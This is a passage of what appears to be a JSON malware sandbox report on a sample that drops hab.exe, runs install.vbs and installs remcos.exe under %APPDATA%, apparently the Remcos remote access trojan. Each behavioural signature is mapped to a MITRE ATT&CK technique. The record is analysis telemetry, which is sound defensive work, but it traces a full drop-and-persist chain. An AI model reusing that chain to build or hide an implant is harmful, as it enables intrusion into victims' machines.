comctl32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003080)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003080)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000792)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000792)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000792)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000792)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00002528)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00001244)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00001244)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hab.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hab.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WScript.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"remcos.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75980000\n \"hab.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75980000\n \"WScript.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75980000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75980000\n \"remcos.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75980000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e686b@ADVAPI32.dll\"\n \"0e000f00703f686b@ADVAPI32.dll\"\n \"0e000f00cc3f686b@ADVAPI32.dll\"\n \"11001200b447686b@ADVAPI32.dll\"\n \"110012004848686b@ADVAPI32.dll\"\n \"120013008c48686b@ADVAPI32.dll\"\n \"12001300e448686b@ADVAPI32.dll\"\n \"14001500386e686b@ADVAPI32.dll\"\n \"14001500506e686b@ADVAPI32.dll\"\n \"14001500686e686b@ADVAPI32.dll\"\n \"17001800806e686b@ADVAPI32.dll\"\n \"0d000e00986e686b@ADVAPI32.dll\"\n \"11001200a86e686b@ADVAPI32.dll\"\n \"11001200bc6e686b@ADVAPI32.dll\"\n \"0f001000fc6f686b@ADVAPI32.dll\"\n \"140015003c70686b@ADVAPI32.dll\"\n \"140015005470686b@ADVAPI32.dll\"\n \"0c000d009c70686b@ADVAPI32.dll\"\n \"0c000d00ac70686b@ADVAPI32.dll\"\n \"0e000f00bc70686b@ADVAPI32.dll\"\n \"0e000f00cc70686b@ADVAPI32.dll\"\n \"0b000c00dc70686b@ADVAPI32.dll\"\n \"180019001473686b@RPCRT4.dll\"\n \"130014004073686b@RPCRT4.dll\"\n \"140015005473686b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateProcessW\" with parameter \"\"C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\"\" - (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00005840)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00006044)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\WScript.exe\" \"%TEMP%\\install.vbs\"\" - (UID: 00000000-00006072)\n \"WScript.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /c \"%APPDATA%\\remcos\\remcos.exe\"\" - (UID: 00000000-00003000)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\remcos\\remcos.exe\" - (UID: 00000000-00003276)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00001464)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00004444)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\WScript.exe\" \"%TEMP%\\install.vbs\"\" - (UID: 00000000-00003528)\n \"WScript.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /c \"%APPDATA%\\remcos\\remcos.exe\"\" - (UID: 00000000-00000956)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\remcos\\remcos.exe\" - (UID: 00000000-00000888)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00004516)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00003188)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\WScript.exe\" \"%TEMP%\\install.vbs\"\" - (UID: 00000000-00003748)\n \"WScript.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /c \"%APPDATA%\\remcos\\remcos.exe\"\" - (UID: 00000000-00003080)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\remcos\\remcos.exe\" - (UID: 00000000-00002528)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00001244)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (UID: 00000000-00005840)\n Spawned process \"hab.exe\" (UID: 00000000-00006044)\n Spawned process \"hab.exe\" (UID: 00000000-00006072)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003000)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00001212)\n Spawned process \"remcos.exe\" (UID: 00000000-00003276)\n Spawned process \"remcos.exe\" (UID: 00000000-00001464)\n Spawned process \"hab.exe\" (UID: 00000000-00004444)\n Spawned process \"hab.exe\" (UID: 00000000-00003528)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00000956)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00002108)\n Spawned process \"remcos.exe\" (UID: 00000000-00000888)\n Spawned process \"remcos.exe\" (UID: 00000000-00004516)\n Spawned process \"hab.exe\" (UID: 00000000-00003188)\n Spawned process \"hab.exe\" (UID: 00000000-00003748)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003080)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00000792)\n Spawned process \"remcos.exe\" (UID: 00000000-00002528)\n Spawned process \"remcos.exe\" (UID: 00000000-00001244)\n Spawned process \"hab.exe\" (UID: 00000000-00004280)\n Spawned process \"hab.exe\" (UID: 00000000-00003460)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (UID: 00000000-00005840)\n Spawned process \"hab.exe\" (UID: 00000000-00006044)\n Spawned process \"hab.exe\" (UID: 00000000-00006072)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003000)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00001212)\n Spawned process \"remcos.exe\" (UID: 00000000-00003276)\n Spawned process \"remcos.exe\" (UID: 00000000-00001464)\n Spawned process \"hab.exe\" (UID: 00000000-00004444)\n Spawned process \"hab.exe\" (UID: 00000000-00003528)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00000956)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00002108)\n Spawned process \"remcos.exe\" (UID: 00000000-00000888)\n Spawned process \"remcos.exe\" (UID: 00000000-00004516)\n Spawned process \"hab.exe\" (UID: 00000000-00003188)\n Spawned process \"hab.exe\" (UID: 00000000-00003748)\n Spawned process \"WScript.exe\" with commandline \"\"%TEMP%\\\\install.vbs\"\" (UID: 00000000-00003080)\n Spawned process \"cmd.exe\" with commandline \"/c \"%APPDATA%\\\\remcos\\\\remcos.exe\"\" (UID: 00000000-00000792)\n Spawned process \"remcos.exe\" (UID: 00000000-00002528)\n Spawned process \"remcos.exe\" (UID: 00000000-00001244)\n Spawned process \"hab.exe\" (UID: 00000000-00004280)\n Spawned process \"hab.exe\" (UID: 00000000-00003460)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"remcos.exe\" (UID: 00000000-00003276) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"hab.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"hab.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"remcos.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"remcos.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005840)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\remcos (UID: 00000000-00006072)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006072)\n \"WScript.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003000)\n \"remcos.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00001464)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\remcos (UID: 00000000-00003528)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003528)\n \"WScript.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00000956)\n \"remcos.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004516)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\remcos (UID: 00000000-00003748)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003748)\n \"WScript.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003080)\n \"remcos.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00001244)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-20", "type": 3, "relevance": 5, "name": "Reads Windows Trust Settings", "description": "\"WScript.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING\"; Key: \"STATE\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc\" has an executable section named \".text\"\n \"hab.exe\" has an executable section named \".text\"\n \"remcos.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc\" has an writable section named \".data\"\n \"hab.exe\" has an writable section named \".data\"\n \"remcos.exe\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"00000000-00006072.00000000.66904.00400000.00000004.mdmp\")\n Found string \"explorer.exe,\" (Indicator: \"explorer.exe\"; File: \"00000000-00006072.00000000.66904.00400000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"hab.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hab.exe]- [targetUID: 00000000-00003080]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"remcos.exe\" - Location: [%APPDATA%\\remcos\\remcos.exe]- [targetUID: 00000000-00002528]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\IPHlpApi.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\dhcpcsvc.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\CRYPTBASE.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"hab.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"WScript.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"remcos.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": 